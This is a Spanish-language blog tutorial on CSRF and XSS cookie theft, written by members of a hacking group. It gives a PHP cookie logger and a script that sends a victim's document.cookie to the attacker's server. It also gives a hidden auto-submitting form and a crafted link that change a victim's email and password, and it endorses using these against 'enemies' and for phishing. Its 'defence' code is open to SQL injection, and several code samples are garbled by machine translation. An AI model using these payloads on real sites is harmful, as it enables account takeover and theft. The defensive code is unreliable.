&lt;br&gt;&lt;br /&gt;Cross Site Request Forgery el ataque se efectúa cuando por ejemplo  Vemos algo &lt;br&gt;&lt;br /&gt;Así &lt;a href="http://www.diosdelared.com/redirect.php?go=http://Www.shadinessdark.net" target="link"&gt; Presiona este link para que te lleve a mi sitio &lt;/a&gt; &lt;br&gt;&lt;br /&gt;&lt;br /&gt;Siempre el atacante usa como victima a un usuario que le brinda confianza la Web. &lt;br&gt;&lt;br /&gt;Los que tenemos foros sabemos que cada usuario tiene como destino un perfil donde&lt;br&gt;&lt;br /&gt;Cambiamos contraseña – email – nombre de usuario y otras cositas casi siempre el Atacante usa un código malicioso para hacer una petición en {GET – Post – HTTP}&lt;br&gt;&lt;br /&gt;Con esta vulnerabilidad el atacante le puede cambiar a la victima su información de PERFIL.  &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;3.) Quien descubrió la vulnerabilidad CSRF&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;En el 1988 Hardy Norma publico un documento que explique una solicitud cuestión nivel de confianza que llamo un&lt;br&gt;&lt;br /&gt;Diputado confuso. En 2000, un correo a bugtraq explico Zope fue afectado por un problema confuso&lt;br&gt;&lt;br /&gt;Web diputado que se define hoy como una vulnerabilidad CSRF mas tarde en el 2001 Peter Watkins publico una entrada&lt;br&gt;&lt;br /&gt;&lt;br /&gt;En la lista de correo bugtraq acuñar el termino CSRF en respuesta a otro hilo titulado&lt;br&gt;&lt;br /&gt;Los peligros de permitir a los usuarios colocar imágenes en los sitios Web.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno sobre quien lo descubrio ese credito si no me toca a mi esa parte es de &lt;a href="http://www.diosdelared.com/redirect.php?go=http://www.cgisecurity.com/csrf-faq.html" target="link"&gt;Aqui&lt;/a&gt; solo lo logre traducir...&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;4.) CSRF  y Xss &lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Quizás muchas personas nos preguntamos o se preguntan si esta vulnerabilidad &lt;br&gt;&lt;br /&gt;Es parecida o igual a xss.&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Les explico bueno xss se aprovecha de la confianza de la victima  que tiene el sitio&lt;br&gt;&lt;br /&gt;Web o aplicación el usuario lea ae contenido que aparece en su navegador que esta destinada y representada por el sitio Web que se esta viendo.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;El csrf se aprovecha de la confianza que el sitio tiene para la victima ósea usuario… &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;4.1) Robo de Cookies en XSS &amp;amp; CSRF (Diferencia) - Colaboracion de Zero Bits&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno hay un metodo en XSS que algunos amigos me han dicho que se parece a el XSRF o CSRF, que son el ROBO DE COOKIES EN XSS y el CSRF, la verdad es que no ya que, el robo de cookies por xss como su nombre lo indica roba las cookies de cualquier usuario o administrador del sitio y el CSRF se encarga de ROBAR, VER y CAMBIAR cualquier informacion dependiendo de la victima que caiga.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Vamos a ver un ROBO DE COOKIES EN XSS y un ataque CSRF clasico, para que vean un poco la diferencia...&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;- ROBO DE COOKIES EN XSS&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Primero tendriamos que saber si el server es vulnerable a XSS o tambien podriamos probar que el code &lt;br&gt;&lt;br /&gt;[code ][url ] o [img ] [/code ]&lt;br&gt;&lt;br /&gt;no filtre bien el contenido que se le asigne.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Para algunos que no entienden lo de [code ][url ] y [img ][/code ] es cuando dentro del [code ][url ][/code ] agregariamos un link como [code ]"javascript:alert("xss")"[/code ] y cuando se le de click se ejecute hay mismo, tambien podriamos agregar XSS con codes HEXADECIMALES (ya esto es otro tema, asi que no lo explicare).&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno, en otro servidor aparte (que seria el nuestro) codeariamos un programa en PHP que se encargue de recibir al usuario victima y robarle las cookies apenas entre (Para esto se necesita saber por lo menos PHP BASICO)&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;&amp;lt;?&lt;br /&gt;$cookie = $_REQUEST[cookie];&lt;br /&gt;$file=fopen("cookies.txt", "a");&lt;br /&gt;fput($file, "$cookie\n");&lt;br /&gt;fclose($file);&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;PD: Este code no es mio es de Chebyte. Pero esto es basico...&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno, le explicare el code para quienes no lo entiendan:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;$cookie = $_REQUEST[cookie] : El que recibe la cookie&lt;br&gt;&lt;br /&gt;$file=fopen("cookies.txt", "a") : Crea el archivo cookies.txt para lectura&lt;br&gt;&lt;br /&gt;fput($file, "$cookie\n") : Muestra la cookie&lt;br&gt;&lt;br /&gt;&lt;br /&gt;fclose($file) : Cierra&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Podriamos guardarlo "robador.php" y ahora faltaria el code que redireccione a este CODE:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;&amp;lt;script&amp;gt;self.location='e);"target=" _blank"&amp;gt;http://TuWeb.com/robador.php?c='+scape(document.cookie)&amp;lt;/script&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Y Tachan! tienes la cookie...&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno antes que nada les dire lo SCRIPT KIDDIE y BUENO de este metodo:&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;1. SCRIPT KIDDIE: Usar este metodo contra webs de Hacking&lt;br&gt;&lt;br /&gt;2. NO-LAMMER: Usar contra sites malos como: Porno, Pedofilia, Estafadores, Enemigos, EMOS!!!, etc..&lt;br&gt;&lt;br /&gt;3. SCRIPT KIDDIE: Aprender este metodo unicamente sin saber como funciona&lt;br&gt;&lt;br /&gt;4. NO-LAMMER: Aprender JAVASCRIPT, HTML y PHP&lt;br&gt;&lt;br /&gt;5. MEDIO: Usarla para Phishing [Es malo y es bueno xD, pero no es lammer]&lt;br&gt;&lt;br /&gt;5. SCRIPT KIDDIE: Hacking MSN -.-"&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Ahora pasaremos a hablar del CSRF clasico:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;- XSRF/CSRF Clasico&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno ahora usaremos una forma de XSRF clasico, pero no de robo si no de CAMBIO de datos, que seria primero como dije probar si el server es vulnerable a JAVASCRIPT, o si no filtra bien el contenido de los BBCODES, o los inputs mal programados, o tambien podriamos atacar normal, sin que el usuario sepa que es un ataque.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Podriamos atacar sin que la victima sepa que es malo asi (dependiendo de la pagina):&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;&amp;lt;form action="formulario" action="http://victima.com/perfil.php" method="POST"&amp;gt;&lt;br /&gt;&amp;lt;input type="hidden" name="email" value="tuemail@hotmail.com"&amp;gt;&lt;br /&gt;&amp;lt;input type="hidden" name="passwirdl" value="minuevopassword"&amp;gt;&lt;br /&gt;&amp;lt;input type="hidden" name="submit" value="enviar"&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;script&amp;gt;document.submit();&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Como dije depende de la web, SI EL SITE NO TIENE AL CAMBIAR DATOS, REPITE EL EMAIL o CONTRASEÑA es vulnerable y tambien de los input "name=NOMBRE" del site. La victima no sabe que le hemos cambiado el email...&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Tambien si al cambiar datos salga un link como este:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;[quote]http://www.web.com/perfil.php?user=NOMBREUSUARIONUEVO&amp;amp;mail=minuevomail@hotmail.com&amp;amp;pass=minuevopass[/quote]&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Es super hiper mega vulnerable ya que notamos que no dice en el link a cambiar: PASSANTERIOR o EMAILANTERIOR... y que pasa si le mandamos un MP (Mensaje Privado) depende claro si es un foro con un link como este:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Man vota por mi &lt;div class="px"&gt;&lt;pre width="70"&gt;&lt;a href="http://www.diosdelared.com/redirect.php?go=http://www.web.com/perfil.php?mail=EMAIL_DEL_ATACANTE_BUAJAJA@hotmail.com&amp;amp;pass=PasSCambiadoBuajaja" target="link"&gt;AQUI&lt;/a&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Y al hacer click en cualquiera de los ejemplos los datos han sido cambiados..&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Espero que les haya gustado mi parte en este bonito tutorial creado por mi bro ShadinessDark y puedan entender la diferencia entre XSS (El robo de cookies) y CSRF...&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;5.)Testeando vulnerabilidad CSRF y programas el code vulnerable&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Los ataques csrf lo reproducen por etiquetas HTML/JAVASCRIPT o una&lt;br&gt;&lt;br /&gt; Imagen, daré un breve ejemplo:  &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Un ejemplo nos envían un correo electrónico o un MP en algún foro cuyo propósito&lt;br&gt;&lt;br /&gt;Del atacante es que al darle clic realiza una solicitud a una URL del atacante les Mostrare un ejemplo: &lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Por ejemplo usando una imagen src.&lt;br&gt;&lt;br /&gt;&amp;lt;img src="http://Www.xD.com/?Comando"&amp;gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Script  &lt;br&gt;&lt;br /&gt;&amp;lt;script src="http://Www.xD.com/?Comando"&amp;gt; &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Casi siempre se usan los IFRAME &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&amp;lt;iframe src="http://Www.xD.com/?Comando"&amp;gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Los ejemplos de arribas son dados con HTML ahora les doy el ejemplo de los de Javascript &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&amp;lt;script&amp;gt; &lt;br&gt;&lt;br /&gt;var foo = new Image(); var foo = new Image (); &lt;br&gt;&lt;br /&gt;foo.src = "http://Www.xD.com/?Comando";&amp;lt;/script&amp;gt; &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;También se puede hacer por XHTML pero hay que usar IE y bueno esa no se las explicare en este tutorial y si quieren me avisan y bueno lo modifico, Claro que existen muchas formas Vbscript – Actionscript – HTML – Javascript -  JScript y otros que utilizan de marcado en los navegadores de los usuarios que hacen&lt;br&gt;&lt;br /&gt;Realizar peticiones REMOTAS. &lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;&lt;br&gt;&lt;br /&gt;¿Cambiando datos de la victima? &lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno este breve codigo es solo un pequeño ejemplo:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&amp;lt;script&amp;gt;&lt;br&gt;&lt;br /&gt;var post_data = 'name=value'; post_data var = 'nombre = valor';&lt;br&gt;&lt;br /&gt;var xmlhttp=new XMLHttpRequest(); var xmlhttp = new XMLHttpRequest ();&lt;br&gt;&lt;br /&gt;xmlhttp.open("POST", 'http://www.xD.com/path/file.ext', true); xmlhttp.open ( "POST", "http://www.xD.com/path/file.ext ', true);&lt;br&gt;&lt;br /&gt;xmlhttp.onreadystatechange = function () { xmlhttp.onreadystatechange = function () (&lt;br&gt;&lt;br /&gt;&lt;br /&gt;if (xmlhttp.readyState == 4) if (xmlhttp.readyState == 4)&lt;br&gt;&lt;br /&gt;{ (&lt;br&gt;&lt;br /&gt;alert(xmlhttp.responseText); alert (xmlhttp.responseText);&lt;br&gt;&lt;br /&gt;} )&lt;br&gt;&lt;br /&gt;}; );&lt;br&gt;&lt;br /&gt;xmlhttp.send(post_data); xmlhttp.send (post_data);&lt;br&gt;&lt;br /&gt;&amp;lt;/script&amp;gt; &amp;lt;/ script&amp;gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Como podemos ver en este código hacemos una petición a POST&lt;br&gt;&lt;br /&gt;Acuérdense que arriba les comente que cuando el atacante usa un código&lt;br&gt;&lt;br /&gt;Malicioso hace una petición en Get. Post y HTTP ¿Se acuerdan? Espero y me vayan entendiendo...&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;¿A dónde se dirige esta petición?&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno esta petición se dirige a la base de datos del sitio me explico&lt;br&gt;&lt;br /&gt;Cada vez que hacemos cambios extremos en nuestro perfil todo pasa&lt;br&gt;&lt;br /&gt;Por una base de datos  bueno cuando la victima le da clic a la url enviada&lt;br&gt;&lt;br /&gt;Por el atacante hace una petición en la base de datos y cambia los datos de la cuenta&lt;br&gt;&lt;br /&gt;&lt;br /&gt;De la victima de confianza por el atacante ¿Me van entendiendo a que se debe este ataque?    &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;7.) Sacando una conclusión a todo.&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Mirando la lógica a todo este ataque se basa en un código malicioso que es muy usado, HTML Y Javascript.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Es un tipo de ataque que por parte de HTML usamos la etiqueta src y en javascript Usamos la misma etiqueta este ataque es basado en darle clic a un vinculo al Redireccionar la Web y cargar cambia la información que de nuestro usuario.&lt;br&gt;&lt;br /&gt;Haciendo una petición en la base de datos del código del atacante…&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;&lt;br&gt;&lt;br /&gt;8.) Como cuidar nuestra Web de este tipo de ataques&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Primero que nada vamos a nuestro FTP introducimos nuestros datos y entramos a la Carpeta public_html o donde este el archivo index.php le añadiremos algo que diga &lt;br&gt;&lt;br /&gt;‘Actualcontraseña’  Antes de seguir el código que pondré es sacado de la siguiente pagina &lt;a href="http://www.diosdelared.com/redirect.php?go=http://foros.hackerss.com/lofiversion/index.php/t8392.html" target="link"&gt;De aquí &lt;/a&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Después que estemos en el index.php introduciremos este código con el Actualcontraseña  esto tiene que ir dentro de &lt;b&gt;&amp;lt;?php…&lt;/b&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;&amp;lt;form method="POST" action="datos.php" name="datos"&amp;gt;&lt;br /&gt;          Usuario &amp;lt;input type="text" name="usuario"&amp;gt;&lt;br /&gt;          Email &amp;lt;input type="text" name="email"&amp;gt;&lt;br /&gt;&lt;br /&gt;          Contraseña &amp;lt;input type="text" name="contraseña"&amp;gt;&lt;br /&gt;          Email alternativo: &amp;lt;input type="text" name="emailalternativo"&amp;gt;&lt;br /&gt;      Contraseña Actual: &amp;lt;input type="text" name="actualcontraseña"&amp;gt;&lt;br /&gt;         &amp;lt;input type="submit" name="submit" value="cambiardatos"&amp;gt;&lt;br /&gt;     &amp;lt;/form&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Luego buscamos el archive que se llama Config.php lo pueden encontrar &lt;br&gt;&lt;br /&gt;Por el mismo FTP y le agregamos lo siguiente: &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;&amp;lt;?php&lt;br /&gt;&lt;br /&gt;$bd_host = "localhost";&lt;br /&gt;$bd_usuario = "user";&lt;br /&gt;$bd_password = "pass";&lt;br /&gt;$bd_base = "bd";&lt;br /&gt;&lt;br /&gt;$con = mysql_connect($bd_host, $bd_usuario, $bd_password); mysql_select_db($bd_base, $con);&lt;br /&gt;&lt;br /&gt;?&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;En el archive datos.php usaremos lo siguiente:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;&amp;lt;?&lt;br /&gt;&lt;br /&gt;include('config.php');&lt;br /&gt;&lt;br /&gt;     session_start();&lt;br /&gt;     if(isset($_REQUEST['usuario']))&lt;br /&gt;          $usuario = $_REQUEST['usuario'];&lt;br /&gt;     else&lt;br /&gt;          die("Rellene el campo Usuario");&lt;br /&gt;     if(isset($_REQUEST['email']))&lt;br /&gt;          $email = $_REQUEST['email];&lt;br /&gt;     else &lt;br /&gt;          die("Rellene el campo email");&lt;br /&gt;     if(isset($_REQUEST['contraseña']))&lt;br /&gt;          $contraseña = $_REQUEST['contraseña];&lt;br /&gt;     else &lt;br /&gt;          die("Rellene el campo Contraseña");&lt;br /&gt;     if(isset($_REQUEST['emailalternativo']))&lt;br /&gt;          $emailalternativo = $_REQUEST['emailalternativo];&lt;br /&gt;     else &lt;br /&gt;          die("Falta el email alternativo");&lt;br /&gt;    if(isset($_REQUEST['actualcontraseña']))&lt;br /&gt;          $actualcontraseña = $_REQUEST['actualcontraseña];&lt;br /&gt;     else &lt;br /&gt;          die("Especifique la contraseña");&lt;br /&gt;&lt;br /&gt;if ($actualcontraseña==NULL) {&lt;br /&gt;echo "Especifique su contraseña Actual";&lt;br /&gt;&lt;br /&gt;}else{&lt;br /&gt;&lt;br /&gt;$query = mysql_query("SELECT usuario,actualcontraseña FROM myhosting_usuarios WHERE username = '$usuario'") or die(mysql_error());&lt;br /&gt;$data = mysql_fetch_array($query);&lt;br /&gt;if($data['contraseñaa'] != $actualcontraseña) {&lt;br /&gt;echo "Contraseña Actual Inavalida";&lt;br /&gt;}else{&lt;br /&gt;&lt;br /&gt;    CambiarDatos($usuario, $email, $contraseña, $emailalternativo);&lt;br /&gt;     &lt;br /&gt;     ?&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Ahora vamos a nuestro panel entramos a PHPMYADMIN ósea a nuestro phpmyadmin&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Y le damos donde dice Consulta y introducen el siguiente código: &lt;br&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;CREATE TABLE 'myhosting_usuarios' (&lt;br /&gt;  'id' int(11) NOT NULL auto_increment,&lt;br /&gt;  'usuario' varchar(15) NOT NULL,&lt;br /&gt;  'email' varchar(15) NOT NULL,&lt;br /&gt;  'emailalternativo' varchar(15) NOT NULL,&lt;br /&gt;  'contraseña' varchar(150) NOT NULL,&lt;br /&gt;  'contraseñaa' varchar(150) NOT NULL,&lt;br /&gt;  KEY 'id' ('id')&lt;br /&gt;) ENGINE=MyISAM;&lt;br /&gt;&lt;br /&gt;INSERT INTO 'myhosting_usuarios' VALUES (1, 'SecurityKill', 'mymail@gmail.com', 'mymail2@gmail.com', 'mypass', 'mypass');&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;9.) Despedida&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Bueno señores ya hemos terminado este tutorial quizás muchos no entendieron &lt;br&gt;&lt;br /&gt;Y otros si me entendieron traten de hacer lo mejor por dar una buena explicación &lt;br&gt;&lt;br /&gt;Pero recuerden que no todo se pone tan fácil, Bueno en este tutorial compartí gran &lt;br&gt;&lt;br /&gt;Parte con mi hermano zero bits que su parte quedo maravillosa lo se porque lo lei&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Me gustan las críticas  así que espero las críticas tutorial escrito a mano todo los derechos del autor reservados y los códigos no todos son nuestros por eso hemos&lt;br&gt;&lt;br /&gt;Puesto en algunos la fuente les deseo un gran fin de semana… &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;No pongo mi sitio Web porque siempre los Web Master andan con el trauma de que &lt;br&gt;&lt;br /&gt;Hacemos Spam como si con eso piensan que acabaran el Spam sueñen un rato…  &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Group’s Ethical.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Zero Bits &lt;br&gt;&lt;br /&gt;KuTer &lt;br&gt;&lt;br /&gt;&lt;br /&gt;Jeferx &lt;br&gt;&lt;br /&gt;Darki113r &lt;br&gt;&lt;br /&gt;_84kur10_&lt;br&gt;&lt;br /&gt;ShadinessDark &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Mi team V1rtu@l VIRu$ Bl@ck Team&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-1820063963495522064?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/1820063963495522064/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=1820063963495522064&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/1820063963495522064?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/1820063963495522064?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2009/12/tutorial-vulnerabilidad-csrf-by.html" title="[Tutorial] Vulnerabilidad CSRF  By ShadinessDark [Colaboracion de Zero Bits]" /><author><name>Zero Bits</name><uri>http://www.blogger.com/profile/17744207739622178280</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="15367576321469896738" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry></feed>
